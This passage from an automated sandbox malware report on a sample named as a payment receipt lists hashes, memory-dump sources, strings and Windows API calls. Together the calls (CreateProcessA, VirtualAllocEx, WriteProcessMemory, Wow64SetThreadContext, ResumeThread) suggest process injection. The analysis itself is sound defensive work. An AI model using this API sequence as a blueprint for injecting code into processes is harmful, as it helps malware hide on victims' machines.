                                                    • Opcode Fuzzy Hash: 588c49ed7aa67f21d23c862133542885ca2f3567eb844ed752f81289839830fb
                                                    • Instruction Fuzzy Hash: FEB1F671E15209DFDB58DFAAD58069EFBB2FF88300F20E42AD515AB254DB349A06CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2654d68b9c5dddb48396b3efea43d33d642403a889009889c995fba45142391f
                                                    • Instruction ID: b00881faf0ac8c0ddae31706be2260f8e658679fe95b3b80966b5812bd40e2b2
                                                    • Opcode Fuzzy Hash: 2654d68b9c5dddb48396b3efea43d33d642403a889009889c995fba45142391f
                                                    • Instruction Fuzzy Hash: 77A19235E003199FCB04DFA5D8949DDFBBAFF89314F148215E81AAB2A0DB30AD85CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24c89ca24c9b224b38c094e4abdf77e8616ec24123039f1b4b81ef4b890934c0
                                                    • Instruction ID: 95d16796b265dc5f8b3b74fa69751530c10a68cd0ef6d6683a4b73bed261da45
                                                    • Opcode Fuzzy Hash: 24c89ca24c9b224b38c094e4abdf77e8616ec24123039f1b4b81ef4b890934c0
                                                    • Instruction Fuzzy Hash: 76916235E003199FCB04DFB1D8949DDF7BAFF99314B148215E816AB2A4DB30AD86CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 360c42341ff62cf4a11a481ab1a7a15c6d10aa4e68956d9c12d89be50be2a809
                                                    • Instruction ID: 3b6908b6b760e4ee699cbf445909b91ac6cf6d0fed75e81426a63e4e32e96b00
                                                    • Opcode Fuzzy Hash: 360c42341ff62cf4a11a481ab1a7a15c6d10aa4e68956d9c12d89be50be2a809
                                                    • Instruction Fuzzy Hash: C9312870E016588BDB58CFABD8446DEBBB7AFC9300F14C06AE509AA264DB355A45CF90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbc5b00269eba171f01818cc6f9c19c54b941466d7ca627ba527aa896b49f2b0
                                                    • Instruction ID: c59d886396c248239cbe6b161dfbbda84801d2d93acf071025aa1edaad37f9b1
                                                    • Opcode Fuzzy Hash: cbc5b00269eba171f01818cc6f9c19c54b941466d7ca627ba527aa896b49f2b0
                                                    • Instruction Fuzzy Hash: 69C04C279CE004D99790398864004F8AA2DB6CB061F003162952D669124510832546C4

                                                     Control-flow Graph
                                                     • Rendered graph not reproduced (executed/not-executed block colouring and edge list omitted); basic blocks span 5a5ad88-5a5b22d, with calls to 5a59d8c, 5a59e38, 5a59e48, 5a59e58, 5a59e7c, 5a59e8c, 5a5ad61, 5a5ad88, 5a5b460 and 5a5b470.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Haq$Haq$Haq$Haq$Haq
                                                    • API String ID: 0-1792267638
                                                    • Opcode ID: d88a51dda35217ad9500a9b3a6adbff9d784a4b133bc4459d7b2ca205a2bc20a
                                                    • Instruction ID: 64293636ab060b17414e02d4450454a9a2796daa2ffa1188a53ef4513d25264e
                                                    • Opcode Fuzzy Hash: d88a51dda35217ad9500a9b3a6adbff9d784a4b133bc4459d7b2ca205a2bc20a
                                                    • Instruction Fuzzy Hash: 5AB14B35B002188FDB14EB78D554DAEB7F6FF89311B2444A9D816AB3A4DE35EC02CB61

                                                     Control-flow Graph
                                                     • Rendered graph not reproduced (executed/not-executed block colouring and edge list omitted); basic blocks span 6f4a7ec-6f4ab3d, and CreateProcessA is called from block 6f4a987-6f4aa41.
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F4AA2E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: d1613c2fc4f66b6ecc7f30fc78abef3d732adf3572d0fb0acd79f8f4f56ddd1f
                                                    • Instruction ID: fdf68a8c9c624eaf792a1cd3028e0a86a9740d91c5d5625f0e4676d92ff68c0e
                                                    • Opcode Fuzzy Hash: d1613c2fc4f66b6ecc7f30fc78abef3d732adf3572d0fb0acd79f8f4f56ddd1f
                                                    • Instruction Fuzzy Hash: DDA17C71D40219CFEB64DF68C840BEEBBB2FF48304F1485A9D809A7284DB759985CF91

                                                     Control-flow Graph
                                                     • Rendered graph not reproduced (executed/not-executed block colouring and edge list omitted); basic blocks span 6f4a7f8-6f4ab3d, and CreateProcessA is called from block 6f4a987-6f4aa41.
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F4AA2E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 3d33749a02913d0b884f91f0223a683dba10f13e6c7b3952e14c790687f0e5e2
                                                    • Instruction ID: bcbbff3ac89bc4153513e4e269b72c8ff8f878787afb02a7c35f173f07b246f8
                                                    • Opcode Fuzzy Hash: 3d33749a02913d0b884f91f0223a683dba10f13e6c7b3952e14c790687f0e5e2
                                                    • Instruction Fuzzy Hash: CC917B71D00219CFEB64DF68C840BEDBBB2FF48304F1485AAD809A7288DB759985CF91
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 023EB546
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: a6dcddb701532f3e7b30c7f1c39451ea94969fd611d90e31be651be1c33496fb
                                                    • Instruction ID: fac507a4a9272b6f9d444d4e7735800416d8af8d515ccdf6909e3cbf3f66e7fe
                                                    • Opcode Fuzzy Hash: a6dcddb701532f3e7b30c7f1c39451ea94969fd611d90e31be651be1c33496fb
                                                    • Instruction Fuzzy Hash: DB814370A00B558FDB25DF69D04175ABBF2FF88308F00892AD48AD7A90D774E809CF91
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05811F02
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: a3d02d45da8228995317207eda61c7c1650fa905086bcbf738357ceccd0da1da
                                                    • Instruction ID: af4d7659fca890a9690c0a2bdbb8a2ec7c4a2341a33d32007584415d36061e07
                                                    • Opcode Fuzzy Hash: a3d02d45da8228995317207eda61c7c1650fa905086bcbf738357ceccd0da1da
                                                    • Instruction Fuzzy Hash: 5351BEB1D003499FDB14CFA9C884ADEFBB6BF48314F24812AE919AB250D774A845CF94
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05811F02
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: d7b1ba1195d437c954003926cf493568b25903ad9089844a11c531c0543a33d2
                                                    • Instruction ID: e8afb471217f48cae052a79f8c80ac424476a11d499fac9135fdecbb69f46368
                                                    • Opcode Fuzzy Hash: d7b1ba1195d437c954003926cf493568b25903ad9089844a11c531c0543a33d2
                                                    • Instruction Fuzzy Hash: E751BEB1D003499FDB14CF99C888ADEBBB6FF48314F24812AE919AB250D774A845CF94
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 023E59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: d4efe2fc0a8cc65e5ebbcb83a96a25b774e4c06d394ca516999cf839f886abb7
                                                    • Instruction ID: 02ca4c62d1fdf7255e8d17410c0edf9735b2db8b74bf52173dfaff677bf443a9
                                                    • Opcode Fuzzy Hash: d4efe2fc0a8cc65e5ebbcb83a96a25b774e4c06d394ca516999cf839f886abb7
                                                    • Instruction Fuzzy Hash: 4341E5B0C00619CBDB24CFA9C884BCDBBF5BF45308F20815AD409AB295DB75694ACF90
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06EF00D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: dadfa96f4dda81d92f4e57527ef04f8694db5451f400a45413f579000eab4ee0
                                                    • Instruction ID: c24fabd0c01884d07c89688228ea2c1e41eea1093af321916ab2f2e8f3ef0b39
                                                    • Opcode Fuzzy Hash: dadfa96f4dda81d92f4e57527ef04f8694db5451f400a45413f579000eab4ee0
                                                    • Instruction Fuzzy Hash: AE3168B1D053499FEB01CFAAC840AEEBFF5EF4A320F14846AE814E7251D7759944CBA1
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05814471
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: 72331ce0f64b1976edb1d39dfabb3c1606035a66c9b7a9f84faf32caa2fd1e85
                                                    • Instruction ID: 9627aa0f0466e8e1b64d893e6d0c714311dcb37670a64bf9d187cebb0717696f
                                                    • Opcode Fuzzy Hash: 72331ce0f64b1976edb1d39dfabb3c1606035a66c9b7a9f84faf32caa2fd1e85
                                                    • Instruction Fuzzy Hash: 274118B5900209DFDB14CF99C488AAAFBF9FF88314F24C459D919AB321D374A845CFA4
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 023E59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 172184591530c69ecbc1701bb5f4555dfc197982f3e0d032032523a813c045b6
                                                    • Instruction ID: 8d484861eb82b22e6ba4896f54df86e82199628eb24c5bae5eb438325bafefcd
                                                    • Opcode Fuzzy Hash: 172184591530c69ecbc1701bb5f4555dfc197982f3e0d032032523a813c045b6
                                                    • Instruction Fuzzy Hash: DF41D2B0C0061DCBDB24DFA9C884BDDBBF5BF49308F60816AD409AB295DB756949CF90
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F4A600
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 63728c97aafb2fd0d5741e9d7f8fd4fc41e9bb9fa1e00ed4541169e1d8258fbf
                                                    • Instruction ID: 678e0fa696c9fae94f0425aa81d07868ff64c7d40510e9ca45405100576e59be
                                                    • Opcode Fuzzy Hash: 63728c97aafb2fd0d5741e9d7f8fd4fc41e9bb9fa1e00ed4541169e1d8258fbf
                                                    • Instruction Fuzzy Hash: 342148B5D002499FDB10DFA9C885BEEBFF1FF48314F10842AE959A7240C7789940CBA0
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F4A600
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06EF00D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F4A6E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F4A01E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,023ED76E,?,?,?,?,?), ref: 023ED82F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,023ED76E,?,?,?,?,?), ref: 023ED82F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F4A6E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F4A01E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EFDA83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F4A51E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EFDA83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F4A51E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 06F49B4A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 06F49B4A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F4E7AD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F4E7AD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 023EB546
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q
                                                    • API String ID: 0-52440209
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q
                                                    • API String ID: 0-52440209
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q
                                                    • API String ID: 0-1259897404
                                                    • Opcode ID: 6c1a1d172c30573428c67cd0e8e5079375749fc8e3a276e67302d0778e5d721a
                                                    • Instruction ID: b0c23139617023709786e437db77f935205ada8bbaf660fcce05654cff05c40f
                                                    • Opcode Fuzzy Hash: 6c1a1d172c30573428c67cd0e8e5079375749fc8e3a276e67302d0778e5d721a
                                                    • Instruction Fuzzy Hash: 4D017830A0520DAFCB04EFB8E549A9C7FF6FF44215F2089A9E84997215EB305A08CB52
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q
                                                    • API String ID: 0-1259897404
                                                    • Opcode ID: 7269bda1f02e16a28ffe99aa382f57ba2dbd6b35a8307795b68dfcc842bb86cb
                                                    • Instruction ID: 3ac59f16608b0ac167666146917ff29272e6fff162e6d1185427dd0b1399fbc5
                                                    • Opcode Fuzzy Hash: 7269bda1f02e16a28ffe99aa382f57ba2dbd6b35a8307795b68dfcc842bb86cb
                                                    • Instruction Fuzzy Hash: 6AF08C30A00208EFCB04EFB8E54598CBFF6FF44211B2085A9E80597314EF305A48CB42
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a28400e79bfe18e0d874f4a63bf448af9608ec743863e45f6d1bc77de9ace468
                                                    • Instruction ID: a2aaeab95c225aa2cc87e8c14376247d6d98ea16c7f9711dd0ac05bb1bf639b0
                                                    • Opcode Fuzzy Hash: a28400e79bfe18e0d874f4a63bf448af9608ec743863e45f6d1bc77de9ace468
                                                    • Instruction Fuzzy Hash: 06627170F90B818BDB755FB48988FADBBB1BB49320F14492ED5BACB241DB3494C18B45
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08b423e04f7c6c8def9d6921fe139551c12b9da8df5fd0fecaf4c428bc00d3b2
                                                    • Instruction ID: 67529d88a36e1eff24ef03f5584b3182ce43f3bd4a19b01be4cbf239b7ac0f00
